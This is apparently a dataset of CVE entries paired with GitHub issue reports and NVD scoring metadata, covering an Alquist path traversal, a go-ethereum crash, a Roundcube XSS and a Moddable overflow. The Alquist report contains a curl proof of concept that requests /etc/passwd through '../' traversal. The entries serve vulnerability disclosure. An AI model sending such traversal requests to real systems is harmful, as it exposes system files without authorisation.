This attack is also known as “dot-dot-slash”, “directory traversal”, “directory climbing” and “backtracking”.
## Root Cause Analysis
In the case of Alquist, the path traversal vulnerability can be blamed on incorrect usage of the `send_from_directory` Flask call. The vulnerability occurs due to the code snippet shown below
https://github.com/AlquistManager/alquist/blob/280d99f43b11378212652e75f6f3159cde9c1d36/IO/input.py#L79-L82
Here, since the `path` and `file` parameters are attacker controlled, the effective directory and filename passed to the `send_from_directory` call can be controlled by the attacker leading to a path traversal attack.
## Proof of Concept
The bug can be verified using the proof of concept similar to the one shown below.
```
curl -i --path-as-is -s -k -X $'GET' \
-H $'Host: 0.0.0.0:5000' -H $'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \
$'http://0.0.0.0:5000/asd/../../../../../../../../etc/passwd'
```
## Remediation
This can be easily fixed my restricting the value of `file` and `path` parameters by a fixed whitelist of possible values.
## CVSS 3 Score
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
This bug was found using *[CodeQL by Github](codeql.github.com/)* | [Security] : Path Traversal in the IO module | https://api.github.com/repos/AlquistManager/alquist/issues/43/comments | 2 | 2021-09-22T22:32:57Z | 2022-04-23T22:45:19Z | https://github.com/AlquistManager/alquist/issues/43 | 1,004,831,876 | 43 | 2,790 |
CVE-2021-43668 | 2021-11-18T16:15:09.230 | Go-Ethereum 1.10.9 nodes crash (denial of service) after receiving a serial of messages and cannot be recovered. They will crash with "runtime error: invalid memory address or nil pointer dereference" and arise a SEGV signal. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 2.1,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 3.9,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/ethereum/go-ethereum/issues/23866"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://github.com/ethereum/go-ethereum/issues/23866"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:ethereum:go_ethereum:1.10.9:*:*:*:*:*:*:*",
"matchCriteriaId": "AB7CCF6D-23C7-4373-BE4C-A6AE336F38E6",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"476"
] | 476 | https://github.com/ethereum/go-ethereum/issues/23866 | [
"Third Party Advisory"
] | github.com | [
"ethereum",
"go-ethereum"
] | #### System information
Geth version: `1.10.9-unstable-9ada4a2e-20210910`
OS & Version: MacOS
Network: Private test net
#### Expected behaviour
Node sync block in the private net.
#### Actual behaviour
Node crashed down with "runtime error: invalid memory address or nil pointer dereference"
#### Steps to reproduce the behaviour
1. setup a 10-node private geth nodes lcoally
2. setup a fuzzing node continually sending fuzzed messages to other 10 normal geth nodes.
3. After more than 24 hours fuzzing experiment, one of the geth node who is run in fast mode crashed down.
The running command for the node is ````./build/bin/geth --identity "ETH-node10" --datadir "node10" --ethash.dagdir "node10" --port "30312" --maxpeers 15 --networkid 10086 --syncmode "fast" --bootnodes "enode://e71bec68f09c4b9567bd4575d855ea61b179b1d64e6f78c861ebddf3783178f95edaaf39647c1f792bc654d0931ad25415d50c25c437787183c0b0a32a76da85@127.0.0.1:0?discport=30301" --mine --miner.etherbase 0xd192415624a039b24ad571f96cb438de9f0556a7 --miner.threads 1 console ````
#### Backtrace
````
panic: runtime error: invalid memory address or nil pointer dereference
[signal SIGSEGV: segmentation violation code=0x1 addr=0x0 pc=0x43195ff]
goroutine 1 [running]:
github.com/syndtr/goleveldb/leveldb/table.(*Reader).newBlockIter(0xc00031b520, 0xc00033c440, 0x0, 0x0, 0x0, 0x1, 0x0)
github.com/syndtr/goleveldb@v1.0.1-0.20210819022825-2ae1ddf74ef7/leveldb/table/reader.go:734 +0xbf
github.com/syndtr/goleveldb/leveldb/table.NewReader(0x67d22e8, 0xc00038c198, 0x23b, 0x4, 0x8, 0xc000322630, 0xc0001cd180, 0xc0001cd040, 0x0, 0x0, ...)
github.com/syndtr/goleveldb@v1.0.1-0.20210819022825-2ae1ddf74ef7/leveldb/table/reader.go:1085 +0x648
github.com/syndtr/goleveldb/leveldb.(*tOps).open.func1(0xc000581a70, 0xc0002ee100, 0xc0002ee0c0)
github.com/syndtr/goleveldb@v1.0.1-0.20210819022825-2ae1ddf74ef7/leveldb/table.go:428 +0x1cb
github.com/syndtr/goleveldb/leveldb/cache.(*Cache).Get(0xc0002ee100, 0x0, 0x8, 0xc000152b90, 0x0)
github.com/syndtr/goleveldb@v1.0.1-0.20210819022825-2ae1ddf74ef7/leveldb/cache/cache.go:388 +0x28a
github.com/syndtr/goleveldb/leveldb.(*tOps).open(0xc000581b60, 0xc00030c370, 0x437fa69, 0x0, 0x0)
github.com/syndtr/goleveldb@v1.0.1-0.20210819022825-2ae1ddf74ef7/leveldb/table.go:415 +0x86
github.com/syndtr/goleveldb/leveldb.(*tOps).find(0xc000581b60, 0xc00030c370, 0xc0001a7c08, 0x12, 0x12, 0x0, 0x0, 0x0, 0x0, 0x0, ...)
github.com/syndtr/goleveldb@v1.0.1-0.20210819022825-2ae1ddf74ef7/leveldb/table.go:445 +0x90
github.com/syndtr/goleveldb/leveldb.(*version).get.func1(0x0, 0xc00030c370, 0xc0001a7c08)
github.com/syndtr/goleveldb@v1.0.1-0.20210819022825-2ae1ddf74ef7/leveldb/version.go:180 +0x465
github.com/syndtr/goleveldb/leveldb.(*version).walkOverlapping(0xc0001ae5a0, 0x0, 0x0, 0x0, 0xc0001a7c08, 0x12, 0x12, 0xc000152ed8, 0xc000152ea8)
github.com/syndtr/goleveldb@v1.0.1-0.20210819022825-2ae1ddf74ef7/leveldb/version.go:119 +0x29d
github.com/syndtr/goleveldb/leveldb.(*version).get(0xc0001ae5a0, 0x0, 0x0, 0x0, 0xc0001a7c08, 0x12, 0x12, 0x0, 0x0, 0x0, ...)
github.com/syndtr/goleveldb@v1.0.1-0.20210819022825-2ae1ddf74ef7/leveldb/version.go:164 +0x2f1
github.com/syndtr/goleveldb/leveldb.(*DB).get(0xc0001d6000, 0x0, 0x0, 0x0, 0x0, 0xc0002ea6a0, 0xa, 0x10, 0x3e137, 0x0, ...)
github.com/syndtr/goleveldb@v1.0.1-0.20210819022825-2ae1ddf74ef7/leveldb/db.go:785 +0x385
github.com/syndtr/goleveldb/leveldb.(*DB).Get(0xc0001d6000, 0xc0002ea6a0, 0xa, 0x10, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0)
github.com/syndtr/goleveldb@v1.0.1-0.20210819022825-2ae1ddf74ef7/leveldb/db.go:851 +0x13b
github.com/ethereum/go-ethereum/ethdb/leveldb.(*Database).Get(0xc00064a100, 0xc0002ea6a0, 0xa, 0x10, 0x7735940005e39400, 0xc000195020, 0xc0005921c0, 0x0, 0x0)
github.com/ethereum/go-ethereum/ethdb/leveldb/leveldb.go:190 +0x5a
github.com/ethereum/go-ethereum/core/rawdb.NewDatabaseWithFreezer(0x54c0b58, 0xc00064a100, 0xc0001aa6c0, 0x34, 0x525effa, 0x11, 0x410e500, 0xc00064a100, 0x0, 0x0, ...)
github.com/ethereum/go-ethereum/core/rawdb/database.go:159 +0xd5
github.com/ethereum/go-ethereum/core/rawdb.NewLevelDBDatabaseWithFreezer(0xc0000417d0, 0x2c, 0x800, 0x1400, 0xc0001aa6c0, 0x34, 0x525effa, 0x11, 0x0, 0x7b, ...)
github.com/ethereum/go-ethereum/core/rawdb/database.go:245 +0xf4
github.com/ethereum/go-ethereum/node.(*Node).OpenDatabaseWithFreezer(0xc00047e1a0, 0x5256ae7, 0x9, 0x800, 0x1400, 0x0, 0x0, 0x525effa, 0x11, 0x0, ...)
github.com/ethereum/go-ethereum/node/node.go:602 +0x33c
github.com/ethereum/go-ethereum/eth.New(0xc00047e1a0, 0xc000355500, 0xc0002d67b8, 0xc000130af0, 0x47c6dd0)
github.com/ethereum/go-ethereum/eth/backend.go:130 +0x311
github.com/ethereum/go-ethereum/cmd/utils.RegisterEthService(0xc00047e1a0, 0xc000355500, 0xf, 0x0, 0x1)
github.com/ethereum/go-ethereum/cmd/utils/flags.go:1687 +0x225
main.makeFullNode(0xc0001d22c0, 0x525450d, 0x1, 0xc0001ac010)
github.com/ethereum/go-ethereum/cmd/geth/config.go:162 +0x14e
main.geth(0xc0001d22c0, 0x0, 0x0)
github.com/ethereum/go-ethereum/cmd/geth/main.go:311 +0xf4
gopkg.in/urfave/cli%2ev1.HandleAction(0x500f800, 0x5339c80, 0xc0001d22c0, 0xc0000a76e0, 0x0)
gopkg.in/urfave/cli.v1@v1.20.0/app.go:490 +0x82
gopkg.in/urfave/cli%2ev1.(*App).Run(0xc0001981a0, 0xc000194180, 0x3, 0x3, 0x0, 0x0)
gopkg.in/urfave/cli.v1@v1.20.0/app.go:264 +0x5f5
main.main()
github.com/ethereum/go-ethereum/cmd/geth/main.go:254 +0x55
````
When submitting logs: please submit them as text and not screenshots. | Nodes crash down after receiving a serial of messages generated by fuzzer, and cannot be recovered | https://api.github.com/repos/ethereum/go-ethereum/issues/23866/comments | 3 | 2021-11-08T06:39:09Z | 2021-12-15T12:48:34Z | https://github.com/ethereum/go-ethereum/issues/23866 | 1,047,073,684 | 23,866 | 2,791 |
CVE-2021-44025 | 2021-11-19T04:15:06.900 | Roundcube before 1.3.17 and 1.4.x before 1.4.12 is prone to XSS in handling an attachment's filename extension when displaying a MIME type warning message. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://bugs.debian.org/1000156"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/roundcube/roundcubemail/commit/7d7b1dfeff795390b69905ceb63d6391b5b0dfe7"
},
{
"source": "cve@mitre.org",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/roundcube/roundcubemail/commit/faf99bf8a2b7b7562206fa047e8de652861e624a"
},
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/roundcube/roundcubemail/issues/8193"
},
{
"source": "cve@mitre.org",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2021/12/msg00004.html"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NDVGIZMQJ5IOM47Y3SAAJRN5VPANKTKO/"
},
{
"source": "cve@mitre.org",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TP3Y5RXTUUOUODNG7HFEKWYNIPIT2NL4/"
},
{
"source": "cve@mitre.org",
"tags": [
"Third Party Advisory"
],
"url": "https://www.debian.org/security/2021/dsa-5013"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://bugs.debian.org/1000156"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/roundcube/roundcubemail/commit/7d7b1dfeff795390b69905ceb63d6391b5b0dfe7"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/roundcube/roundcubemail/commit/faf99bf8a2b7b7562206fa047e8de652861e624a"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/roundcube/roundcubemail/issues/8193"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2021/12/msg00004.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NDVGIZMQJ5IOM47Y3SAAJRN5VPANKTKO/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": null,
"url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TP3Y5RXTUUOUODNG7HFEKWYNIPIT2NL4/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Third Party Advisory"
],
"url": "https://www.debian.org/security/2021/dsa-5013"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:roundcube:webmail:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DA15B6EF-37D5-4C52-ACE8-BFC70EC57247",
"versionEndExcluding": "1.3.17",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:roundcube:webmail:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E2A9DC05-E22B-4AFF-BA40-7B48BA545461",
"versionEndExcluding": "1.4.12",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "1.4.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:33:*:*:*:*:*:*:*",
"matchCriteriaId": "E460AA51-FCDA-46B9-AE97-E6676AA5E194",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:fedoraproject:fedora:34:*:*:*:*:*:*:*",
"matchCriteriaId": "A930E247-0B43-43CB-98FF-6CE7B8189835",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*",
"matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*",
"matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*",
"matchCriteriaId": "FA6FEEC2-9F11-4643-8827-749718254FED",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/roundcube/roundcubemail/issues/8193 | [
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"roundcube",
"roundcubemail"
] | It is possible to inject arbitrary html/js code through attachment's $file_extension variable that will be executed while displaying "attachmentvalidationerror" warning. | Fix XSS in $file_extension | https://api.github.com/repos/roundcube/roundcubemail/issues/8193/comments | 1 | 2021-08-31T14:29:18Z | 2021-08-31T17:21:43Z | https://github.com/roundcube/roundcubemail/pull/8193 | 983,930,203 | 8,193 | 2,792 |
CVE-2021-29323 | 2021-11-19T17:15:08.027 | OpenSource Moddable v10.5.0 was discovered to contain a heap buffer overflow via the component /modules/network/wifi/esp/modwifi.c. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/Moddable-OpenSource/moddable/issues/5"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/Moddable-OpenSource/moddable/issues/5"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:moddable:moddable:10.5.0:*:*:*:*:*:*:*",
"matchCriteriaId": "A84B5640-6948-4ABD-A530-54E4DF5EAA56",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/Moddable-OpenSource/moddable/issues/5 | [
"Exploit",
"Issue Tracking",
"Patch",
"Third Party Advisory"
] | github.com | [
"Moddable-OpenSource",
"moddable"
] | I have tried a few examples and have noticed that some things occur when trying to run `wifi-config` using `mcconfig -d -m -p esp` from my MacBook Pro 2015.
1. `warning: serialport_set_baudrate: baud rate 921600 may not work` appears consistently
2. `install modules failure` shows up after sync hitting 100% sometimes
I am presuming this relates to `serialport_set_baudrate`
3. An exception seems to always occur due to some timer, that shows up even without the module failure.
```
Exception (28):
epc1=0x4022dced epc2=0x00000000 epc3=0x00000000 excvaddr=0x01610029 depc=0x00000000
ctx: cont
sp: 3ffe97a0 end: 3ffe9a70 offset: 01a0
>>>stack>>>
3ffe9940: 3fff839c 0160ffff fffffffe 4022dce7
3ffe9950: 4022dcb4 3ffe9950 00000000 3ffefe04
3ffe9960: fffffffe 3ffe9a9c 3ffe9984 3fff836c
3ffe9970: 3fff838c 3fff839c 00000000 00000000
3ffe9980: 00000000 4022dc6e 3ffe9950 3ffeffd4
3ffe9990: 3ffefe04 fffffffe 3ffe9a9c 00000000
3ffe99a0: 3fff83fc 00000000 00000000 00000000
3ffe99b0: 00000000 00000000 00000000 00000000
3ffe99c0: 3fff8514 3fff8514 3ffefff4 3ffefcec
3ffe99d0: 3fff8514 3ffeff14 3ffefefc 3ffe9a9c
3ffe99e0: fffffffe 3ffefe04 3ffeffd4 4022b614
3ffe99f0: 3fffdad0 00000000 3ffe9a94 402517a8
3ffe9a00: 00000000 00000020 00000035 00000003
3ffe9a10: 3fff8514 4025d01c 00000021 3fff839c
3ffe9a20: 3fff835c 00000000 00000000 4025cb40
3ffe9a30: feefeffe feefeffe feefeffe 3ffe9a9c
3ffe9a40: 00000000 00000000 00000001 402514a1
3ffe9a50: 3fffdad0 00000000 3ffe9a94 402514cc
3ffe9a60: feefeffe feefeffe 3ffe8a50 4010011c
<<<stack<<<
# EXCEPTION DESCRIPTION
# Exception 28 LoadProhibited: A load referenced a page mapped with an attribute that does not permit loads
# EXCEPTION LOCATION
# 0x4022dced: reportScan at /Users/bfarias/Documents/moddable/modules/network/wifi/esp/modwifi.c:188
# CALLS
# 0x4022dce7: reportScan at /Users/bfarias/Documents/moddable/modules/network/wifi/esp/modwifi.c:188
# 0x4022dcb4: reportScan at /Users/bfarias/Documents/moddable/modules/network/wifi/esp/modwifi.c:184
# 0x4022dc6e: reportScan at /Users/bfarias/Documents/moddable/modules/network/wifi/esp/modwifi.c:178
# 0x4022b614: modTimersExecute at /Users/bfarias/Documents/moddable/modules/base/timer/mc/timer.c:111
# 0x402517a8: loop at /Users/bfarias/Documents/moddable//build/devices/esp/main.cpp:85
# 0x402514a1: esp_schedule at /Users/bfarias/esp/esp8266-2.3.0/cores/esp8266/core_esp8266_main.cpp:110
# 0x402514cc: loop_wrapper() at /Users/bfarias/esp/esp8266-2.3.0/cores/esp8266/core_esp8266_main.cpp:110
# 0x4010011c: cont_norm at /Users/bfarias/esp/esp8266-2.3.0/cores/esp8266/cont.S:109
^[[A^CCaught signal 2
make: *** [debugmac] Error 1
```
4. It fails to load once fully synced and prints `/Users/bfarias/Documents/moddable/modules/piu/MC/piuFont.c (247) # Break: (host): font not found: OpenSans--20!` in xsbug.
This one seems a bit odd, since my build directory doesn't have that string/file name anywhere, but it does have some other `OpenSans` strings:
<details><summary>grep log</summary>
```
$ grep -r "OpenSans" /Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config/
Binary file /Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//main.elf matches
/Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//makefile: $(RESOURCES_DIR)/OpenSans-Regular-20.fnt\
/Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//makefile: $(RESOURCES_DIR)/OpenSans-Semibold-18.fnt\
/Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//makefile: $(RESOURCES_DIR)/OpenSans-Semibold-16.fnt\
/Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//makefile: $(RESOURCES_DIR)/OpenSans-Regular-20-alpha.bmp\
/Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//makefile: $(RESOURCES_DIR)/OpenSans-Semibold-18-alpha.bmp\
/Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//makefile: $(RESOURCES_DIR)/OpenSans-Semibold-16-alpha.bmp\
/Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//makefile:$(RESOURCES_DIR)/OpenSans-Regular-20.fnt: /Users/bfarias/Documents/moddable/examples/piu/wifi-config/fonts/OpenSans-Regular-20.fnt
/Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//makefile: @echo "# copy OpenSans-Regular-20.fnt"
/Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//makefile:$(RESOURCES_DIR)/OpenSans-Semibold-18.fnt: /Users/bfarias/Documents/moddable/examples/piu/wifi-config/fonts/OpenSans-Semibold-18.fnt
/Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//makefile: @echo "# copy OpenSans-Semibold-18.fnt"
/Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//makefile:$(RESOURCES_DIR)/OpenSans-Semibold-16.fnt: /Users/bfarias/Documents/moddable/examples/piu/wifi-config/fonts/OpenSans-Semibold-16.fnt
/Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//makefile: @echo "# copy OpenSans-Semibold-16.fnt"
/Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//makefile:$(RESOURCES_DIR)/OpenSans-Regular-20-alpha.bmp: /Users/bfarias/Documents/moddable/examples/piu/wifi-config/fonts/OpenSans-Regular-20.png $(TMP_DIR)/mc.rotation.h
/Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//makefile: @echo "# png2bmp OpenSans-Regular-20-alpha.bmp"
/Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//makefile: $(PNG2BMP) /Users/bfarias/Documents/moddable/examples/piu/wifi-config/fonts/OpenSans-Regular-20.png -a -o $(@D) -r 0
/Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//makefile:$(RESOURCES_DIR)/OpenSans-Semibold-18-alpha.bmp: /Users/bfarias/Documents/moddable/examples/piu/wifi-config/fonts/OpenSans-Semibold-18.png $(TMP_DIR)/mc.rotation.h
/Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//makefile: @echo "# png2bmp OpenSans-Semibold-18-alpha.bmp"
/Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//makefile: $(PNG2BMP) /Users/bfarias/Documents/moddable/examples/piu/wifi-config/fonts/OpenSans-Semibold-18.png -a -o $(@D) -r 0
/Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//makefile:$(RESOURCES_DIR)/OpenSans-Semibold-16-alpha.bmp: /Users/bfarias/Documents/moddable/examples/piu/wifi-config/fonts/OpenSans-Semibold-16.png $(TMP_DIR)/mc.rotation.h
/Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//makefile: @echo "# png2bmp OpenSans-Semibold-16-alpha.bmp"
/Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//makefile: $(PNG2BMP) /Users/bfarias/Documents/moddable/examples/piu/wifi-config/fonts/OpenSans-Semibold-16.png -a -o $(@D) -r 0
/Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//mc.resources.c: {"OpenSans-Regular-20.fnt", _0, sizeof(_0)},
/Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//mc.resources.c: {"OpenSans-Semibold-18.fnt", _1, sizeof(_1)},
/Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//mc.resources.c: {"OpenSans-Semibold-16.fnt", _2, sizeof(_2)},
/Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//mc.resources.c: {"OpenSans-Regular-20-alpha.bmp", _7, sizeof(_7)},
/Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//mc.resources.c: {"OpenSans-Semibold-18-alpha.bmp", _8, sizeof(_8)},
/Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//mc.resources.c: {"OpenSans-Semibold-16-alpha.bmp", _9, sizeof(_9)},
Binary file /Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//mc.resources.c.o matches
Binary file /Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//mc.resources.c.o.unmapped matches
/Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//mc.xs.c:/* 0706 */ { (txSlot*)&gxHeap[604], -32071, 0x84, XS_KEY_X_KIND, { .key = { "OpenSans20", 0x17240 } }},
/Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//mc.xs.c:/* 0707 */ { (txSlot*)&gxHeap[580], -32070, 0x84, XS_KEY_X_KIND, { .key = { "OpenSans18", 0x17246 } }},
/Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//mc.xs.c:/* 0736 */ { (txSlot*)&gxHeap[726], -32041, 0x84, XS_KEY_X_KIND, { .key = { "OpenSans16", 0x17244 } }},
Binary file /Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//mc.xs.c.o matches
Binary file /Users/bfarias/Documents/moddable/build/tmp/esp/debug/wifi-config//mc.xs.c.o.unmapped matches
